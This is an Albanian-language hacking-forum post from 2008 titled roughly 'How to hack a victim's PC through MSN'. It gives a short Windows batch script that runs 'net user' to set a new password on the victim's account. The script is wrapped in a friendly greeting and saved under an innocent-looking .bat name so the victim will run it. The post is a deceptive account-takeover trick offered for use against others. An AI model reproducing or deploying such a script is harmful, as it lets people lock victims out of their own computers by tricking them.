Execute-FORUM
 
ForumPortalCalendarGalleryPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Si Tja Hack-im Viktimes PC Permes MSN

Shko poshtë 
AutoriMesazh
dr-pipa
Antar 99%
Antar 99%


Numri i postimeve : 251
Registration date : 13/11/2008

MesazhTitulli: Si Tja Hack-im Viktimes PC Permes MSN   Thu Nov 20, 2008 10:00 pm

kjo osht per ata qe nuk e kan kuptu ata te paren qe kjo osht ni menyr me e leht une e kom provu 100% funksionon per te funksionuar kjo duhet te dini net userin e atij qe deshironi tja hackoni pc kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

1echo off
2:net user "P.SH. emri i viktimes" dhe passin e ri qe doni ju *654321*
3:echo "tung i dashuri shok "
4ause

Qe edhe ma shpjegim te mire


1echo off
2:net user Big-POwer *654321*
3:echo Tung MY Freind
4ause

mos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Tung My Freind.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Si Tja Hack-im Viktimes PC Permes MSN
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
Mir se Vini ne ASC FORUM :: Hacking programe & Tutoriale-
Kërce tek: